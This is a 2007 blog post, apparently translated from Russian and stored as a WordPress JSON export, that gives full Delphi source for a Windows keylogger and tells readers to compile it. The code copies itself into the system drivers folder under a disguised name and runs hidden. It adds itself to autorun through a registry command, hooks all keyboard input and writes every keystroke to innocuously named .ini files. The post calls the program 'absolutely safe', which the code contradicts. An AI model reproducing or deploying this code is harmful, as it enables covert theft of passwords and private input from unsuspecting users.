{"id":69,"date":"2007-04-25T15:46:14","date_gmt":"2007-04-25T12:46:14","guid":{"rendered":"http:\/\/pblog.ru\/?p=69"},"modified":"2008-09-09T08:07:00","modified_gmt":"2008-09-09T05:07:00","slug":"%d0%ba%d0%bb%d0%b0%d0%b2%d0%b8%d0%b0%d1%82%d1%83%d1%80%d0%bd%d1%8b%d0%b9-%d1%88%d0%bf%d0%b8%d0%be%d0%bd","status":"publish","type":"post","link":"http:\/\/pblog.ru\/?p=69","title":{"rendered":"Keylogger."},"content":{"rendered":"<p>Here is the source of a simple little keylogger; do whatever you like with it, just don't let it go to your head! 
Among its main advantages I would count the fact that it is very small for a program of this class (19 KB), which incidentally disproves the belief that Delphi programs are bulky, and that it takes up little RAM (usually 1-1.5 MB)!<br \/>\nThe program is absolutely safe and intended for study only! \ud83d\ude42<br \/>\n<!--more--><br \/>\nHere is the code:<\/p>\n<pre><code>program ntrty;<br \/>\n\/\/                  KBS ver. 
1.0<br \/>\n\/\/<br \/>\n\/\/    Keylogger, DE@l Group (c) 2005-2007;<br \/>\n\/\/ On first launch the program copies itself<br \/>\n\/\/ to the path dir under the name name! It also registers<br \/>\n\/\/ that copy in autorun!<br \/>\n\/\/    When launched via autorun, the program writes<br \/>\n\/\/ files to the path %USERPROFILE% named name+number+ext;<br \/>\n\/\/ each launch creates a file with the next<br \/>\n\/\/ sequential number, and once a file reaches the size<br \/>\n\/\/ MaxFileSize the next file is created!<br \/>\n\/\/    When launched manually, the report file<br \/>\n\/\/ is created in the program's directory!<br \/>\n\/\/                            13.04.2007 (Friday)<br \/>\nuses Windows;<\/p>\n<p>const<br \/>\ndir = 'C:\\WINDOWS\\system32\\drivers\\';<br \/>\nname = 'ntrty';<br \/>\next = '.ini';<br \/>\nARCStr = 'cmd \/c reg ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v ';<br \/>\nMaxFileSize = 2048;<br \/>\nvar<br \/>\nHkHnd : hHook;<br \/>\nFCh : file of Char;<br \/>\nline : longint;<br \/>\nhApp : THandle;<br \/>\nwClass : TWndClass;<br \/>\nwMSG : TMSG;<\/p>\n<p>function WC(hInstance: HWND; style,ClsExtra,WndExtra:integer; ICON: hIcon; CURSOR: hCursor; Background: HBrush; ClassName,MenuName: string; Proc: Pointer): TWndClass;<br \/>\nvar<br \/>\nwCls : TWNDClass;<br \/>\nbegin<br \/>\nwCls.hInstance:=hInstance;<br \/>\nwCls.style:= style;<br \/>\nwith wCls do<br \/>\nbegin<br \/>\nhIcon         := ICON;<br \/>\nlpfnWndProc   := Proc;<br \/>\nhbrBackground := Background;<br \/>\nlpszClassName := PChar(ClassName);<br \/>\nhCursor       := CURSOR;<br \/>\ncbClsExtra    := ClsExtra;<br \/>\ncbWndExtra    := WndExtra;<br \/>\nlpszMenuName  := PChar(MenuName);<br \/>\nend;<br \/>\nResult:=wCls;<br \/>\nend;<\/p>\n<p>function CreateWnd(wClass: TWndClass; hInstance: HWND; Caption: string; w,h: integer): HWND;<br \/>\nbegin<br \/>\nResult:=CreateWindow(wClass.lpszClassName,<br \/>\nPChar(Caption),(0 or $C00000 or $800000 or<br \/>\n$400000 or $200000 or $100000 or $10000000),<br \/>\nInteger(DWORD($80000000)),Integer(DWORD($80000000)),<br \/>\nw, h, 0, 0, hInstance, nil);<br 
\/>\nend;<\/p>\n<p>procedure lpWindow(Msg: TMsg);<br \/>\nbegin<br \/>\nwhile GetMessage(Msg,0,0,0) do<br \/>\nbegin<br \/>\nTranslateMessage(Msg);<br \/>\nDispatchMessage(Msg);<br \/>\nend;<br \/>\nend;<\/p>\n<p>function IntToStr(Int: integer): string;<br \/>\nbegin<br \/>\nStr(Int, result);<br \/>\nend;<\/p>\n<p>function FileExists(const FileName : String) : Boolean;<br \/>\nvar<br \/>\nCode : Integer;<br \/>\nbegin<br \/>\nCode := GetFileAttributes(PChar(FileName));<br \/>\nResult := (Code  -1) and (16 and Code = 0);<br \/>\nend;<\/p>\n<p>function GetName: string;<br \/>\nvar<br \/>\ni : longint;<br \/>\nbegin<br \/>\ni:=0;<br \/>\nrepeat<br \/>\nInc(i);<br \/>\nuntil not FileExists(name+IntToStr(i)+ext);<br \/>\nResult:=name+IntToStr(i)+ext;<br \/>\nend;<\/p>\n<p>function Win32Check(RetVal: BOOL): BOOL;<br \/>\nbegin<br \/>\nif not RetVal then GetLastError;<br \/>\nResult := RetVal;<br \/>\nend;<\/p>\n<p>function GetCharFromVKey(vkey: Word): string;<br \/>\nvar<br \/>\nkeyst : TKeyboardState;<br \/>\nretcode : Integer;<br \/>\nbegin<br \/>\nWin32Check(GetKeyboardState(keyst));<br \/>\nSetLength(Result, 2);<br \/>\nretcode := ToAscii(vkey,<br \/>\nMapVirtualKeyA(vkey, 0),<br \/>\nkeyst, @Result[1],0);<br \/>\ncase retcode of<br \/>\n0: Result := '';<br \/>\n1: SetLength(Result, 1);<br \/>\n2: ;<br \/>\nelse<br \/>\nResult := '';<br \/>\nend;<br \/>\nend;<\/p>\n<p>function HookPr(Code: integer; WParam: word; LParam: Longint): Longint; stdcall;<br \/>\nvar<br \/>\nmsg : PEVENTMSG;<br \/>\nb : Char;<br \/>\ns : string;<br \/>\nbegin<br \/>\nif Code &gt;= 0 then<br \/>\nbegin<br \/>\nmsg := Pointer(LParam);<br \/>\nif msg.message=256 then<br \/>\nbegin<br \/>\nInc(line);<br \/>\ns:=GetCharFromVKey(msg.paramL);<br \/>\nif Length(s)&gt;0 then<br \/>\nbegin<br \/>\nb:=s[1];<br \/>\nif (line mod 80)=0 then BlockWrite(FCh,#10#13,2);<br \/>\nBlockWrite(FCh,b,1);<br \/>\nend;<br \/>\nend;<br \/>\nif FileSize(FCh)&gt;MaxFileSize then<br \/>\nbegin<br \/>\nCloseFile(FCh);<br 
\/>\nAssignFile(FCh,GetName);<br \/>\nReWrite(FCh)<br \/>\nend;<br \/>\nresult := CallNextHookEx(HkHnd, code, WParam, LParam);<br \/>\nend;<br \/>\nend;<\/p>\n<p>function WndMessageProc(hWnd: HWND; Msg: UINT; wParam: WPARAM; lParam: LPARAM): UINT; stdcall;<br \/>\nbegin<br \/>\ncase Msg of<br \/>\n1:<br \/>\nbegin<br \/>\nif not FileExists(dir+name+'.exe') then<br \/>\nbegin<br \/>\nCopyfile(PChar(paramstr(0)),dir+name+'.exe',BOOL(0));<br \/>\nWinExec(dir+name+'.exe',SW_Hide);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nWinExec(PChar(ARCStr+name+' \/t REG_SZ \/d '+dir+name+'.exe \/f'),SW_Hide);<br \/>\nline:=0;<br \/>\nAssignFile(FCh,GetName);<br \/>\nReWrite(FCh);<br \/>\nrepeat<br \/>\nHkHnd := SetWindowsHookEx(0, @HookPr, hInstance, 0);<br \/>\nuntil HkHnd0;<br \/>\nend;<br \/>\n2:<br \/>\nbegin<br \/>\nif HkHnd  0 then<br \/>\nUnhookWindowsHookEx(HkHnd);<br \/>\nCloseFile(FCh);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nend;<br \/>\nResult := DefWindowProc(hWnd,Msg,wParam,lParam);<br \/>\nend;<\/p>\n<p>begin<br \/>\nwClass:=WC(hInstance,0,0,0,0,0,15,'MYCLASS','',@WndMessageProc);<br \/>\nRegisterClass(wClass);<br \/>\nhApp:=CreateWindow(wClass.lpszClassName, '',0,<br \/>\nInteger(DWORD($80000000)),<br \/>\nInteger(DWORD($80000000)),<br \/>\n0, 0, 0, 0, hInstance, nil);<br \/>\nif hApp=0 then<br \/>\nbegin<br \/>\nUnregisterClass('MYCLASS',hInstance);<br \/>\nhalt(0);<br \/>\nend;<br \/>\nlpWindow(wMsg);<br \/>\nend.<\/code><\/pre>\n<p>You just need to save this code in a text file with the .dpr extension and open it in Delphi!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here is the source of a simple little keylogger; do whatever you like with it, just don't let it go to your head! Among its main advantages I would count the fact that it is very small for a program of this class (19 KB), which incidentally disproves the belief that Delphi programs are bulky, and that it takes up little RAM (usually 1-1.5 MB)! The program is absolutely safe and intended for study only! 
\ud83d\ude42<\/p>\n","protected":false},"author":19,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,6],"tags":[246,194,282,103,120,217,192],"_links":{"self":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69"}],"collection":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=69"}],"version-history":[{"count":3,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69\/revisions"}],"predecessor-version":[{"id":213,"href":"http:\/\/pblog.ru\/index.php?rest_route=\/wp\/v2\/posts\/69\/revisions\/213"}],"wp:attachment":[{"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=69"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=69"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/pblog.ru\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}